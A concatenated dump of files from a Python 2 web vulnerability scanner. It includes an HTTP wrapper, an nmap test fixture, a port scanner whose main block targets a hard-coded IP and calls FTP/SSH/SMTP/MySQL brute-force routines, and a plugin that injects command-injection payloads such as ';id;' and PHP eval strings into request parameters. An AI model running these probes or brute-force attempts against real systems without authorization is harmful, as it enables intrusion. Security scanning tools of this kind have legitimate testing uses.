realfun,selfobj,realargs,realkwargs = args 49 | while True: 50 | begin = time.time() 51 | now_time = max(0.01,begin-self._time) 52 | 53 | if now_time > 5: 54 | self._conn = 0 55 | self._time = now_time 56 | break 57 | if self._conn/now_time<=self._speed: 58 | break 59 | else: 60 | time.sleep(0.01) 61 | 62 | self._conn +=1 63 | 64 | return apply(realfun,realargs,realkwargs) 65 | 66 | def get_default_headers(self,headers): 67 | ''' 68 | ''' 69 | default_headers = {"User-Agent":self._scan_signature} 70 | 71 | default_headers.update(headers) 72 | 73 | return default_headers 74 | 75 | def get(self,url, headers={}, **kwargs): 76 | ''' 77 | ''' 78 | 79 | default_headers = self.get_default_headers(headers) 80 | 81 | if not isinstance(url,URL): 82 | url = URL(url) 83 | 84 | requests_response = None 85 | 86 | try: 87 | 88 | requests_response = requests.get(url.url_string,headers=default_headers,**kwargs) 89 | 90 | except: 91 | 92 | return self._make_response(requests_response,url) 93 | 94 | response = self._make_response(requests_response,url) 95 | 96 | return response 97 | 98 | def post(self,url, headers={}, data=None, **kwargs): 99 | ''' 100 | ''' 101 | 102 | default_headers = self.get_default_headers(headers) 103 | 104 | if not isinstance(url,URL): 105 | url = URL(url) 106 | 107 | requests_response = None 108 | 109 | try: 110 | 111 | requests_response = requests.post(url.url_string,headers=default_headers,data=data,**kwargs) 112 | 113 | except: 114 | 115 | return self._make_response(requests_response,url) 116 | 117 | response = self._make_response(requests_response,url) 118 | 119 | return response 120 | 121 | 122 | def __getattr__(self,name): 123 | ''' 124 | ''' 125 | print name 126 | #getattr(requests,name.lower()) 127 | 128 | 129 | def _send_req(self,req): 130 | ''' 131 | ''' 132 | method = req.get_method() 133 | 134 | uri = req.get_url().get_uri_string() 135 | 136 | querystring = req.get_get_param() 137 | 138 | postdata = req.get_post_param() 139 | 140 | headers = req.get_headers() 141 | 142 | cookies = self._scan_cookies 143 | 144 | proxies = self._scan_proxies 145 | 146 | send = getattr(requests,method.lower()) 147 | 148 | requests_response = None 149 | 150 | try: 151 | 152 | requests_response = send(uri,params=querystring,data=postdata,headers=headers,cookies=cookies,proxies=proxies) 153 | 154 | except: 155 | 156 | return self._make_response(requests_response,req.get_url()) 157 | 158 | else: 159 | 160 | response = self._make_response(requests_response,req.get_url()) 161 | 162 | return response 163 | 164 | def _make_response(self,resp_from_requests,req_url): 165 | ''' 166 | ''' 167 | if resp_from_requests is None: 168 | 169 | response = Response(req_url=req_url) 170 | 171 | else: 172 | 173 | response = from_requests_response(resp_from_requests,req_url) 174 | 175 | return response 176 | 177 | wcurl = wCurl() 178 | -------------------------------------------------------------------------------- /teye_web/http/encode_decode.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | encode_decode.py 4 | ''' 5 | import re 6 | from htmlentitydefs import name2codepoint 7 | import urllib 8 | import sys 9 | 10 | # This pattern matches a character entity reference (a decimal numeric 11 | # references, a hexadecimal numeric reference, or a named reference). 12 | CHAR_REF_PATT = re.compile(r'&(#(\d+|x[\da-fA-F]+)|[\w.:-]+);?', re.U) 13 | 14 | def htmldecode(text, use_repr=False): 15 | """ 16 | Decode HTML entities in the given text. 17 | 18 | >>> htmldecode('hola mundo') == 'hola mundo' 19 | True 20 | >>> htmldecode(u'hólá múndó') == u'hólá múndó' 21 | True 22 | >>> htmldecode(u'hola ƻ') == u'hola \u01bb' ## u'hola ƻ' 23 | True 24 | >>> htmldecode(u'hola mundo A') == u'hola mundo A' 25 | True 26 | >>> htmldecode(u'á') == u'\xe1' ## u'á' 27 | True 28 | """ 29 | 30 | # Internal function to do the work 31 | def entitydecode(match): 32 | entity = match.group(1) 33 | 34 | if entity.startswith('#x'): 35 | return unichr(int(entity[2:], 16)) 36 | 37 | elif entity.startswith('#'): 38 | return unichr(int(entity[1:])) 39 | 40 | elif entity in name2codepoint: 41 | return unichr(name2codepoint[entity]) 42 | 43 | else: 44 | return match.group(0) 45 | 46 | # "main" 47 | return CHAR_REF_PATT.sub(entitydecode, text) 48 | 49 | 50 | def urlencode(query, encoding, safe='%/\<>"\'=:()'): 51 | ''' 52 | This is my version of urllib.urlencode. It adds "/" as a safe character 53 | and also adds support for "repeated parameter names". 54 | 55 | Note: 56 | This function is EXPERIMENTAL and should be used with care ;) 57 | 58 | Original documentation: 59 | Encode a sequence of two-element tuples or dictionary into a URL query 60 | string. 61 | 62 | If any values in the query arg are sequences and doseq is true, each 63 | sequence element is converted to a separate parameter. 64 | 65 | If the query arg is a sequence of two-element tuples, the order of the 66 | parameters in the output will match the order of parameters in the 67 | input. 68 | 69 | 70 | >>> import cgi 71 | >>> urlencode(cgi.parse_qs(u'a=1&a=c'), 'latin1') 72 | 'a=1&a=c' 73 | >>> urlencode(cgi.parse_qs(u'a=1&b=c'), 'latin1') 74 | 'a=1&b=c' 75 | >>> urlencode(cgi.parse_qs(u'a=á&a=2'), 'latin1') 76 | 'a=%C3%A1&a=2' 77 | >>> urlencode(u'a=b&c=d', 'utf-8') 78 | Traceback (most recent call last): 79 | ... 80 | TypeError: not a valid non-string sequence or mapping object 81 | ''' 82 | 83 | if hasattr(query, "items"): 84 | # mapping objects 85 | query = query.items() 86 | else: 87 | # it's a bother at times that strings and string-like objects are 88 | # sequences... 89 | try: 90 | # non-sequence items should not work with len() 91 | # non-empty strings will fail this 92 | if len(query) and not isinstance(query[0], tuple): 93 | raise TypeError 94 | # zero-length sequences of all types will get here and succeed, 95 | # but that's a minor nit - since the original implementation 96 | # allowed empty dicts that type of behavior probably should be 97 | # preserved for consistency 98 | except TypeError: 99 | try: 100 | tb = sys.exc_info()[2] 101 | raise TypeError, "not a valid non-string sequence or mapping "\ 102 | "object", tb 103 | finally: 104 | del tb 105 | 106 | l = [] 107 | is_unicode = lambda x: isinstance(x, unicode) 108 | 109 | if encoding=="gbk": 110 | encoding = "utf-8" 111 | 112 | for k, v in query: 113 | # first work with keys 114 | k = k.encode(encoding) if is_unicode(k) else str(k) 115 | k = urllib.quote(k, safe) 116 | 117 | if isinstance(v, basestring): 118 | v = [v] 119 | else: 120 | try: 121 | # is this a sufficient test for sequence-ness? 122 | len(v) 123 | except TypeError: 124 | v = [str(v)] 125 | for ele in v: 126 | ele = ele.encode(encoding) if is_unicode(ele) else str(ele) 127 | l.append(k + '=' + urllib.quote(ele, safe)) 128 | 129 | return '&'.join(l) 130 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_down.xml: -------------------------------------------------------------------------------- 1 | <?xml version="1.0"?> 2 | <?xml-stylesheet href="file:///usr/share/nmap/nmap.xsl" type="text/xsl"?> 3 | <!-- Nmap 5.51 scan initiated Thu Apr 4 20:55:51 2013 as: nmap -oX test/1_hosts_down.xml 10.1.1.1 --> 4 | <nmaprun scanner="nmap" args="nmap -oX test/1_hosts_down.xml 10.1.1.1" start="1365101751" startstr="Thu Apr 4 20:55:51 2013" version="5.51" xmloutputversion="1.03"> 5 | <scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/> 6 | <verbose level="0"/> 7 | <debugging level="0"/> 8 | <host starttime="1365101751" endtime="1365101755"><status state="up" reason="reset"/> 9 | <address addr="10.1.1.1" addrtype="ipv4"/> 10 | <hostnames> 11 | </hostnames> 12 | <ports><extraports state="filtered" count="1000"> 13 | <extrareasons reason="no-responses" count="1000"/> 14 | </extraports> 15 | </ports> 16 | <times srtt="826" rttvar="2554" to="100000"/> 17 | </host> 18 | <runstats><finished time="1365101755" timestr="Thu Apr 4 20:55:55 2013" elapsed="4.55" summary="Nmap done at Thu Apr 4 20:55:55 2013; 1 IP address (1 host up) scanned in 4.55 seconds" exit="success"/><hosts up="1" down="0" total="1"/> 19 | </runstats> 20 | </nmaprun> 21 | -------------------------------------------------------------------------------- /teye_port/PortScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | import os 4 | import sys 5 | 6 | from thirdparty.libnmap.process import NmapProcess 7 | from thirdparty.libnmap.parser import NmapParser,NmapParserException 8 | 9 | import re 10 | import time 11 | import socket 12 | 13 | import brute_ftp 14 | #import brute_ssh 15 | #import brute_smtp 16 | #import brute_mysql 17 | 18 | class PortScan: 19 | ''' 20 | ''' 21 | NORMAL= 0 22 | 23 | NMAP_STATE=["open"]#open,filtered,closed,unfiltered 24 | 25 | NMAP_OPTIONS = "-sV -p 21-25,80-89,110,111,443,513,873,1080,1433,1521,2375,3306,3389,3690,5900,6379,7001,8000-8090,9000,9418,11211,27017-27019,50060" 26 | 27 | def __init__(self): 28 | ''' 29 | ''' 30 | self._check_port = [21,22,80,110,111,873,1433,3306,3389,6379,27017] 31 | 32 | self._timeout = 5 33 | 34 | self._http_target = [] 35 | 36 | self._s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 37 | 38 | self._s.settimeout(float(self._timeout)) 39 | 40 | def is_ipaddr(self,target): 41 | ''' 42 | ''' 43 | ip_re = re.compile("\d{1,3}\.\d{1,3}\.\d{1,3}\.") 44 | if ip_re.search(target): 45 | return True 46 | else: 47 | return False 48 | 49 | def get_ipaddr(self,domain): 50 | ''' 51 | ''' 52 | ipaddr = None 53 | 54 | if self.is_ipaddr(domain): 55 | ipaddr = domain 56 | else: 57 | ipaddr = socket.gethostbyname(domain) 58 | 59 | return ipaddr 60 | 61 | def is_alive(self,netloc): 62 | ''' 63 | ''' 64 | if netloc.find(":")>-1: 65 | ipaddr = self.get_ipaddr(netloc.split(":")[0]) 66 | port = int(netloc.split(":")[1]) 67 | else: 68 | ipaddr = self.get_ipaddr(netloc) 69 | port = 80 70 | 71 | try: 72 | s = socket.socket() 73 | status = s.connect_ex((ipaddr,port)) 74 | s.close() 75 | if status == PortScan.NORMAL: 76 | return True 77 | else: 78 | return False 79 | except Exception,e: 80 | 81 | return False 82 | 83 | def nmap_scan(self,target,option=NMAP_OPTIONS): 84 | ''' 85 | ''' 86 | #初始化self._http_target 87 | if len(self._http_target)>0: 88 | self._http_target = [] 89 | 90 | #Nmap param should str or list 91 | if isinstance(target,unicode): 92 | str_target = target.encode("utf-8") 93 | nmap_proc = NmapProcess(targets=str_target,options=option) 94 | nmap_proc.run_background() 95 | 96 | run_time = 0 97 | 98 | while nmap_proc.is_running(): 99 | #print '%s' % (nmap_proc.command) 100 | time.sleep(5) 101 | 102 | if nmap_proc.is_successful(): 103 | result = dict() 104 | nmap_report = NmapParser.parse(nmap_proc.stdout) 105 | 106 | for host in nmap_report.hosts: 107 | 108 | ipaddr = host.address 109 | if not ipaddr: 110 | continue 111 | 112 | port_open = [] 113 | for item in host.services: 114 | if item.state.lower() in PortScan.NMAP_STATE: 115 | info = item.service_dict 116 | port = item.port 117 | name = info.get("name") 118 | product = info.get("product") 119 | 120 | if name.find("http")>-1: 121 | if self.is_ipaddr(target): 122 | http_item = ipaddr +":"+str(port) 123 | self._http_target.append(http_item) 124 | else: 125 | http_item = target + ":" + str(port) 126 | self._http_target.append(http_item) 127 | 128 | port_open.append(port) 129 | #print host.address 130 | #print port 131 | #print name 132 | #print product 133 | result[ipaddr] = port_open 134 | 135 | return result 136 | 137 | def get_http_target(self): 138 | ''' 139 | ''' 140 | return self._http_target 141 | 142 | def scan_port(self,target): 143 | ''' 144 | ''' 145 | port_open = [] 146 | 147 | result = dict() 148 | 149 | if self.is_alive(target): 150 | port_open.append(80) 151 | 152 | ipaddr = self.get_ipaddr(target) 153 | 154 | for port in self._check_port: 155 | try: 156 | status=self._s.connect_ex((ipaddr,port)) 157 | 158 | if status == PortScan.NORMAL: 159 | if port not in port_open: 160 | port_open.append(port) 161 | 162 | else: 163 | print str(port) + ": no open" 164 | except Exception,e: 165 | 166 | continue 167 | 168 | time.sleep(0.1) 169 | 170 | self._s.close() 171 | 172 | result[ipaddr]=port_open 173 | 174 | return result 175 | 176 | if __name__=="__main__": 177 | ''' 178 | ''' 179 | target = "31.193.196.16" 180 | 181 | ps = PortScan() 182 | 183 | print "Port Scanning Host:" + ps.get_ipaddr(target) 184 | 185 | open_ports = ps.nmap_scan(target) 186 | 187 | print open_ports 188 | 189 | if 21 in open_ports: 190 | brute_ftp.brute(target_ipaddr,"username.lst","password.lst") 191 | 192 | if 22 in open_ports: 193 | brute_ssh.brute(target_ipaddr,"username.lst","password.lst") 194 | 195 | if 25 in open_ports: 196 | brute_smtp.brute(target_ipaddr,"username.lst","password.lst") 197 | 198 | if 3306 in open_ports: 199 | brute_mysql.brute(target_ipaddr,"username.lst","password.lst") 200 | -------------------------------------------------------------------------------- /teye_web/cmd.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | cmd.py 4 | ''' 5 | import sys 6 | 7 | sys.path.append("/Users/imiyoo/workplace/tscanner/") 8 | import teye_data.severity as severity 9 | from teye_data.vuln import vuln 10 | from teye_data.vulnmanager import vm 11 | 12 | from LogManager import log 13 | 14 | import re 15 | import copy 16 | 17 | # wCurl 18 | from wCurl import wcurl 19 | from http.Request import Request 20 | 21 | from util.smart_fill import smart_fill 22 | 23 | 24 | class cmd: 25 | ''' 26 | ''' 27 | 28 | def __init__(self): 29 | ''' 30 | ''' 31 | # 扫描模式:0为对参数进行FUZZ,1为对路径进行FUZZ 32 | self._fuzz_mode = 0 33 | 34 | self._cmd_db = self._get_cmd_db() 35 | 36 | def check(self, t_request): 37 | ''' 38 | ''' 39 | log.info(u"正在检测目标是否存在命令执行漏洞...") 40 | 41 | http_request = copy.deepcopy(t_request) 42 | if http_request.get_method() == "GET": 43 | param_dict = http_request.get_get_param() 44 | 45 | if http_request.get_method() == "POST": 46 | param_dict = http_request.get_post_param() 47 | 48 | cmd_payload_list = self._get_payload_list(param_dict) 49 | 50 | for name, poc_info, pattern in cmd_payload_list: 51 | if http_request.get_method() == "GET": 52 | res = wcurl.get(http_request.get_url().get_uri_string(), params=poc_info) 53 | if self._find_vuln(res, pattern): 54 | v = vuln() 55 | url = res.get_url() 56 | v.set_url(url.get_uri_string() + "?" + str(poc_info)) 57 | v.set_method("GET") 58 | v.set_param(name) 59 | v.set_name("CMD Vuln") 60 | v.set_rank(severity.H) 61 | vm.append(self, url.get_host(), "cmd", v) 62 | log.info("CMD Vuln") 63 | print u"CMD Vuln 漏洞URL:%s,漏洞参数:%s" % (url, name) 64 | 65 | def _find_vuln(self, res, pattern): 66 | ''' 67 | ''' 68 | res_body = res.body 69 | 70 | if res_body is None: 71 | return False 72 | 73 | result = re.search(pattern, res_body, re.I) 74 | if result: 75 | return True 76 | 77 | return False 78 | 79 | def _get_cmd_db(self): 80 | ''' 81 | #"type":"linux","cmd":"id","payload":";id;","pattern":"" 82 | ''' 83 | cmd_db = [] 84 | 85 | cmd_item = {} 86 | cmd_item["type"] = "linux" 87 | cmd_item["cmd"] = "id" 88 | # "||id;", 89 | cmd_item["payload"] = [";id;", "';id;'"] 90 | cmd_item["pattern"] = r"uid=\d+\(\w+\)\s*gid=\d+\(\w+\)\s*groups=\d+\(\w+\)" 91 | cmd_db.append(cmd_item) 92 | 93 | cmd_item = {} 94 | cmd_item["type"] = "php" 95 | cmd_item["cmd"] = "print(md5(imiyoo))" 96 | cmd_item["payload"] = [";${print(md5(imiyoo))}", "';${print(md5(imiyoo))};'", "\"]=1;${print(md5(imiyoo))};//"] 97 | cmd_item["pattern"] = r"1417a3e718a3d279aefda8711a0f5f65" 98 | cmd_db.append(cmd_item) 99 | 100 | cmd_item = {} 101 | cmd_item["type"] = "win" 102 | cmd_item["cmd"] = "set" 103 | cmd_item["payload"] = [";set;", "||set;"] 104 | cmd_item["pattern"] = r"SystemRoot=C:\Windows" 105 | cmd_db.append(cmd_item) 106 | 107 | return cmd_db 108 | 109 | def _fill_param(self, param): 110 | ''' 111 | @param:{"a":[1]} 112 | ''' 113 | param_dict = copy.deepcopy(param) 114 | 115 | for key, value in param_dict.iteritems(): 116 | str_value = "".join(value) 117 | if str_value == "": 118 | param_dict[key] = smart_fill(key) 119 | 120 | return param_dict 121 | 122 | def _get_payload_list(self, param): 123 | ''' 124 | ''' 125 | res = [] 126 | 127 | o_param_dict = self._fill_param(param) 128 | 129 | o_param_key = o_param_dict.keys() 130 | 131 | for name in o_param_key: 132 | o_v = o_param_dict.get(name) 133 | if type(o_v) is list: 134 | if len(o_v) <= 1: 135 | o_v = "".join(o_v) 136 | else: 137 | continue 138 | 139 | for item in self._cmd_db: 140 | cmdtype = item["type"] 141 | pattern = item["pattern"] 142 | payload_list = item["payload"] 143 | for p in payload_list: 144 | # payload的构造形式为:原始值+payload 145 | o_param_dict[name] = o_v + p 146 | 147 | # 完整的参数信息,字典类型 148 | poc_param_dict = copy.deepcopy(o_param_dict) 149 | poc_tuple = (name, poc_param_dict, pattern) 150 | res.append(poc_tuple) 151 | return res 152 | 153 | def get_name(self): 154 | ''' 155 | ''' 156 | return "teye_cmd_plugin" 157 | 158 | 159 | if __name__ == "__main__": 160 | ''' 161 | ''' 162 | cmd_url = "http://192.168.126.143/book/cmd/1_cmd.php?data=test" 163 | req = Request(cmd_url) 164 | t_scanner = cmd() 165 | t_scanner.check(req) 166 | --------------------------------------------------------------------------------